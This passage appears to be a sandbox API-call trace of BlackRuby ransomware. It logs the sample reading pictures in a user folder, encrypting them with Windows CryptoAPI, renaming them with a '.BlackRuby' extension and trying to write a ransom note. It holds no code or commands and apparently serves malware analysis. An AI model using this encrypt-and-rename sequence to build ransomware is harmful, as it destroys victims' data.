lpFileName="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif", lpFilePart=0x0) returned 0x2c [0060.703] GetLastError () returned 0x5 [0060.703] SetErrorMode (uMode=0x1) returned 0x0 [0060.703] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif" (normalized: "c:\\users\\eebsym5\\pictures\\f51 lu7mheokk0.gif"), fInfoLevelId=0x0, lpFileInformation=0x1bfc290 | out: lpFileInformation=0x1bfc290*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb511b990, ftCreationTime.dwHighDateTime=0x1d35169, ftLastAccessTime.dwLowDateTime=0xf05660c0, ftLastAccessTime.dwHighDateTime=0x1d34f5a, ftLastWriteTime.dwLowDateTime=0xf05660c0, ftLastWriteTime.dwHighDateTime=0x1d34f5a, nFileSizeHigh=0x0, nFileSizeLow=0xfd33)) returned 1 [0060.703] GetLastError () returned 0x5 [0060.703] SetErrorMode (uMode=0x0) returned 0x1 [0060.708] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif", lpFilePart=0x0) returned 0x2c [0060.708] GetLastError () returned 0x5 [0060.708] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif", lpFilePart=0x0) returned 0x2c [0060.708] GetLastError () returned 0x5 [0060.708] SetErrorMode (uMode=0x1) returned 0x0 [0060.708] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif" (normalized: "c:\\users\\eebsym5\\pictures\\f51 lu7mheokk0.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0060.708] GetLastError () returned 0x0 [0060.708] GetFileType (hFile=0x258) returned 0x1 [0060.708] SetErrorMode (uMode=0x0) returned 0x1 [0060.708] GetFileType (hFile=0x258) returned 0x1 [0060.708] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0xfd33 [0060.708] GetLastError () returned 0x0 [0060.708] ReadFile (in: hFile=0x258, lpBuffer=0x1bfe444, nNumberOfBytesToRead=0xfd33, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1bfe444*, lpNumberOfBytesRead=0x18ed84*=0xfd33, lpOverlapped=0x0) returned 1 [0060.709] GetLastError () returned 0x0 [0060.709] CloseHandle (hObject=0x258) returned 1 [0060.709] GetLastError () returned 0x0 [0060.709] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif", lpFilePart=0x0) returned 0x2c [0060.709] GetLastError () returned 0x0 [0060.709] SetErrorMode (uMode=0x1) returned 0x0 [0060.709] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif" (normalized: "c:\\users\\eebsym5\\pictures\\f51 lu7mheokk0.gif"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb511b990, ftCreationTime.dwHighDateTime=0x1d35169, ftLastAccessTime.dwLowDateTime=0xf05660c0, ftLastAccessTime.dwHighDateTime=0x1d34f5a, ftLastWriteTime.dwLowDateTime=0xf05660c0, ftLastWriteTime.dwHighDateTime=0x1d34f5a, nFileSizeHigh=0x0, nFileSizeLow=0xfd33)) returned 1 [0060.709] GetLastError () returned 0x0 [0060.709] SetErrorMode (uMode=0x0) returned 0x1 [0060.720] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c78264, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ce0) returned 1 [0060.721] GetLastError () returned 0x0 [0060.721] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.721] GetLastError () returned 0x0 [0060.726] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.726] GetLastError () returned 0x0 [0060.726] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360d60) returned 1 [0060.726] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.726] GetLastError () returned 0x0 [0060.726] CryptSetKeyParam (hKey=0x360d60, dwParam=0x4, pbData=0x1ca52b0*=0x1, dwFlags=0x0) returned 1 [0060.726] GetLastError () returned 0x0 [0060.726] CryptSetKeyParam (hKey=0x360d60, dwParam=0x1, pbData=0x1ca527c, dwFlags=0x0) returned 1 [0060.726] GetLastError () returned 0x0 [0060.726] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ca52f8*, pdwDataLen=0x18ed74*=0xfe30, dwBufLen=0xfe30 | out: pbData=0x1ca52f8*, pdwDataLen=0x18ed74*=0xfe30) returned 1 [0060.727] GetLastError () returned 0x0 [0060.727] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cc4f84*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cc4f84*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.727] GetLastError () returned 0x0 [0060.727] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cc4fb4*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cc4fb4*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.727] GetLastError () returned 0x0 [0060.728] CryptDestroyKey (hKey=0x360ce0) returned 1 [0060.728] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.728] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.728] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif", lpFilePart=0x0) returned 0x2c [0060.728] GetLastError () returned 0x0 [0060.728] SetErrorMode (uMode=0x1) returned 0x0 [0060.728] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif" (normalized: "c:\\users\\eebsym5\\pictures\\f51 lu7mheokk0.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0060.729] GetLastError () returned 0xb7 [0060.729] GetFileType (hFile=0x258) returned 0x1 [0060.729] SetErrorMode (uMode=0x0) returned 0x1 [0060.729] GetFileType (hFile=0x258) returned 0x1 [0060.729] WriteFile (in: hFile=0x258, lpBuffer=0x1cc4fe4*, nNumberOfBytesToWrite=0xfe40, lpNumberOfBytesWritten=0x18ed90, lpOverlapped=0x0 | out: lpBuffer=0x1cc4fe4*, lpNumberOfBytesWritten=0x18ed90*=0xfe40, lpOverlapped=0x0) returned 1 [0060.731] GetLastError () returned 0xb7 [0060.731] CloseHandle (hObject=0x258) returned 1 [0060.732] GetLastError () returned 0xb7 [0060.732] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif", lpFilePart=0x0) returned 0x2c [0060.732] GetLastError () returned 0xb7 [0060.732] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_9yrpIqFCbtz62BegZozjHX188g91Ky5eD3PRrCh5G2mueD9.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_9yrpIqFCbtz62BegZozjHX188g91Ky5eD3PRrCh5G2mueD9.BlackRuby", lpFilePart=0x0) returned 0x5d [0060.732] GetLastError () returned 0xb7 [0060.732] SetErrorMode (uMode=0x1) returned 0x0 [0060.732] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif" (normalized: "c:\\users\\eebsym5\\pictures\\f51 lu7mheokk0.gif"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb511b990, ftCreationTime.dwHighDateTime=0x1d35169, ftLastAccessTime.dwLowDateTime=0xf05660c0, ftLastAccessTime.dwHighDateTime=0x1d34f5a, ftLastWriteTime.dwLowDateTime=0x2c6398e0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xfe40)) returned 1 [0060.732] GetLastError () returned 0xb7 [0060.732] SetErrorMode (uMode=0x0) returned 0x1 [0060.732] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\f51 lu7mheOkK0.gif" (normalized: "c:\\users\\eebsym5\\pictures\\f51 lu7mheokk0.gif"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_9yrpIqFCbtz62BegZozjHX188g91Ky5eD3PRrCh5G2mueD9.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\encrypted_9yrpiqfcbtz62begzozjhx188g91ky5ed3prrch5g2mued9.blackruby")) returned 1 [0060.733] GetLastError () returned 0xb7 [0060.734] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0060.734] GetLastError () returned 0xb7 [0060.734] SetErrorMode (uMode=0x1) returned 0x0 [0060.734] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.734] GetLastError () returned 0x5 [0060.735] SetErrorMode (uMode=0x0) returned 0x1 [0060.736] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg", lpFilePart=0x0) returned 0x29 [0060.736] GetLastError () returned 0x5 [0060.736] SetErrorMode (uMode=0x1) returned 0x0 [0060.736] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\h3y4mn0lzgo.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1cf1f28 | out: lpFileInformation=0x1cf1f28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb61a5920, ftCreationTime.dwHighDateTime=0x1d3512b, ftLastAccessTime.dwLowDateTime=0x295a63c0, ftLastAccessTime.dwHighDateTime=0x1d359a2, ftLastWriteTime.dwLowDateTime=0x295a63c0, ftLastWriteTime.dwHighDateTime=0x1d359a2, nFileSizeHigh=0x0, nFileSizeLow=0xb5b2)) returned 1 [0060.736] GetLastError () returned 0x5 [0060.736] SetErrorMode (uMode=0x0) returned 0x1 [0060.736] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg", lpFilePart=0x0) returned 0x29 [0060.736] GetLastError () returned 0x5 [0060.736] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg", lpFilePart=0x0) returned 0x29 [0060.736] GetLastError () returned 0x5 [0060.736] SetErrorMode (uMode=0x1) returned 0x0 [0060.736] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\h3y4mn0lzgo.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0060.736] GetLastError () returned 0x0 [0060.736] GetFileType (hFile=0x258) returned 0x1 [0060.736] SetErrorMode (uMode=0x0) returned 0x1 [0060.736] GetFileType (hFile=0x258) returned 0x1 [0060.737] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0xb5b2 [0060.737] GetLastError () returned 0x0 [0060.737] ReadFile (in: hFile=0x258, lpBuffer=0x1cf3c74, nNumberOfBytesToRead=0xb5b2, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1cf3c74*, lpNumberOfBytesRead=0x18ed84*=0xb5b2, lpOverlapped=0x0) returned 1 [0060.737] GetLastError () returned 0x0 [0060.737] CloseHandle (hObject=0x258) returned 1 [0060.738] GetLastError () returned 0x0 [0060.738] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg", lpFilePart=0x0) returned 0x29 [0060.738] GetLastError () returned 0x0 [0060.738] SetErrorMode (uMode=0x1) returned 0x0 [0060.738] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\h3y4mn0lzgo.jpg"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb61a5920, ftCreationTime.dwHighDateTime=0x1d3512b, ftLastAccessTime.dwLowDateTime=0x295a63c0, ftLastAccessTime.dwHighDateTime=0x1d359a2, ftLastWriteTime.dwLowDateTime=0x295a63c0, ftLastWriteTime.dwHighDateTime=0x1d359a2, nFileSizeHigh=0x0, nFileSizeLow=0xb5b2)) returned 1 [0060.738] GetLastError () returned 0x0 [0060.738] SetErrorMode (uMode=0x0) returned 0x1 [0060.738] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c818) returned 1 [0060.738] GetLastError () returned 0x0 [0060.776] CryptImportKey (in: hProv=0x37c818, pbData=0x1b70c04, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360fa0) returned 1 [0060.776] GetLastError () returned 0x0 [0060.776] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.776] GetLastError () returned 0x0 [0060.781] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.781] GetLastError () returned 0x0 [0060.781] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360b60) returned 1 [0060.781] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.781] GetLastError () returned 0x0 [0060.781] CryptSetKeyParam (hKey=0x360b60, dwParam=0x4, pbData=0x1b9dc50*=0x1, dwFlags=0x0) returned 1 [0060.781] GetLastError () returned 0x0 [0060.781] CryptSetKeyParam (hKey=0x360b60, dwParam=0x1, pbData=0x1b9dc1c, dwFlags=0x0) returned 1 [0060.781] GetLastError () returned 0x0 [0060.781] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b9dc98*, pdwDataLen=0x18ed74*=0xb6b0, dwBufLen=0xb6b0 | out: pbData=0x1b9dc98*, pdwDataLen=0x18ed74*=0xb6b0) returned 1 [0060.782] GetLastError () returned 0x0 [0060.782] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bb4a24*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1bb4a24*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.782] GetLastError () returned 0x0 [0060.782] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bb4a54*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1bb4a54*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.782] GetLastError () returned 0x0 [0060.782] CryptDestroyKey (hKey=0x360fa0) returned 1 [0060.782] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.782] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.782] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg", lpFilePart=0x0) returned 0x29 [0060.782] GetLastError () returned 0x0 [0060.782] SetErrorMode (uMode=0x1) returned 0x0 [0060.782] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\h3y4mn0lzgo.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0060.783] GetLastError () returned 0xb7 [0060.783] GetFileType (hFile=0x258) returned 0x1 [0060.783] SetErrorMode (uMode=0x0) returned 0x1 [0060.783] GetFileType (hFile=0x258) returned 0x1 [0060.785] CloseHandle (hObject=0x258) returned 1 [0060.785] GetLastError () returned 0xb7 [0060.785] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg", lpFilePart=0x0) returned 0x29 [0060.785] GetLastError () returned 0xb7 [0060.785] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_vpt3Nto1vWgOT61Ri6CyoUQiL7GyBKRYOSSNtFO0Ju.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_vpt3Nto1vWgOT61Ri6CyoUQiL7GyBKRYOSSNtFO0Ju.BlackRuby", lpFilePart=0x0) returned 0x58 [0060.785] GetLastError () returned 0xb7 [0060.785] SetErrorMode (uMode=0x1) returned 0x0 [0060.785] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\h3y4mn0lzgo.jpg"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb61a5920, ftCreationTime.dwHighDateTime=0x1d3512b, ftLastAccessTime.dwLowDateTime=0x295a63c0, ftLastAccessTime.dwHighDateTime=0x1d359a2, ftLastWriteTime.dwLowDateTime=0x2c6d1e60, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xb6c0)) returned 1 [0060.785] GetLastError () returned 0xb7 [0060.785] SetErrorMode (uMode=0x0) returned 0x1 [0060.785] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\h3y4mn0lZGO.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\h3y4mn0lzgo.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_vpt3Nto1vWgOT61Ri6CyoUQiL7GyBKRYOSSNtFO0Ju.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\encrypted_vpt3nto1vwgot61ri6cyouqil7gybkryossntfo0ju.blackruby")) returned 1 [0060.786] GetLastError () returned 0xb7 [0060.786] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0060.786] GetLastError () returned 0xb7 [0060.786] SetErrorMode (uMode=0x1) returned 0x0 [0060.786] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.786] GetLastError () returned 0x5 [0060.787] SetErrorMode (uMode=0x0) returned 0x1 [0060.787] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif", lpFilePart=0x0) returned 0x27 [0060.787] GetLastError () returned 0x5 [0060.787] SetErrorMode (uMode=0x1) returned 0x0 [0060.787] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif" (normalized: "c:\\users\\eebsym5\\pictures\\kncfpz60a.gif"), fInfoLevelId=0x0, lpFileInformation=0x1bdd218 | out: lpFileInformation=0x1bdd218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73243fa0, ftCreationTime.dwHighDateTime=0x1d355ea, ftLastAccessTime.dwLowDateTime=0x8f559050, ftLastAccessTime.dwHighDateTime=0x1d35196, ftLastWriteTime.dwLowDateTime=0x8f559050, ftLastWriteTime.dwHighDateTime=0x1d35196, nFileSizeHigh=0x0, nFileSizeLow=0x11980)) returned 1 [0060.787] GetLastError () returned 0x5 [0060.787] SetErrorMode (uMode=0x0) returned 0x1 [0060.788] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif", lpFilePart=0x0) returned 0x27 [0060.788] GetLastError () returned 0x5 [0060.788] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif", lpFilePart=0x0) returned 0x27 [0060.788] GetLastError () returned 0x5 [0060.788] SetErrorMode (uMode=0x1) returned 0x0 [0060.788] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif" (normalized: "c:\\users\\eebsym5\\pictures\\kncfpz60a.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0060.788] GetLastError () returned 0x0 [0060.788] GetFileType (hFile=0x258) returned 0x1 [0060.788] SetErrorMode (uMode=0x0) returned 0x1 [0060.788] GetFileType (hFile=0x258) returned 0x1 [0060.788] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x11980 [0060.788] GetLastError () returned 0x0 [0060.788] ReadFile (in: hFile=0x258, lpBuffer=0x1bdee8c, nNumberOfBytesToRead=0x11980, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1bdee8c*, lpNumberOfBytesRead=0x18ed84*=0x11980, lpOverlapped=0x0) returned 1 [0060.789] GetLastError () returned 0x0 [0060.789] CloseHandle (hObject=0x258) returned 1 [0060.789] GetLastError () returned 0x0 [0060.789] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif", lpFilePart=0x0) returned 0x27 [0060.789] GetLastError () returned 0x0 [0060.789] SetErrorMode (uMode=0x1) returned 0x0 [0060.789] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif" (normalized: "c:\\users\\eebsym5\\pictures\\kncfpz60a.gif"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73243fa0, ftCreationTime.dwHighDateTime=0x1d355ea, ftLastAccessTime.dwLowDateTime=0x8f559050, ftLastAccessTime.dwHighDateTime=0x1d35196, ftLastWriteTime.dwLowDateTime=0x8f559050, ftLastWriteTime.dwHighDateTime=0x1d35196, nFileSizeHigh=0x0, nFileSizeLow=0x11980)) returned 1 [0060.789] GetLastError () returned 0x0 [0060.789] SetErrorMode (uMode=0x0) returned 0x1 [0060.789] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0060.790] GetLastError () returned 0x0 [0060.825] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c5c52c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ee0) returned 1 [0060.825] GetLastError () returned 0x0 [0060.825] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.825] GetLastError () returned 0x0 [0060.830] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.830] GetLastError () returned 0x0 [0060.830] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360f20) returned 1 [0060.830] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.830] GetLastError () returned 0x0 [0060.830] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1c89578*=0x1, dwFlags=0x0) returned 1 [0060.830] GetLastError () returned 0x0 [0060.830] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1c89544, dwFlags=0x0) returned 1 [0060.830] GetLastError () returned 0x0 [0060.830] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c895c0*, pdwDataLen=0x18ed74*=0x11a80, dwBufLen=0x11a80 | out: pbData=0x1c895c0*, pdwDataLen=0x18ed74*=0x11a80) returned 1 [0060.830] GetLastError () returned 0x0 [0060.830] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cacaec*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cacaec*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.831] GetLastError () returned 0x0 [0060.831] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cacb1c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cacb1c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.831] GetLastError () returned 0x0 [0060.831] CryptDestroyKey (hKey=0x360ee0) returned 1 [0060.831] 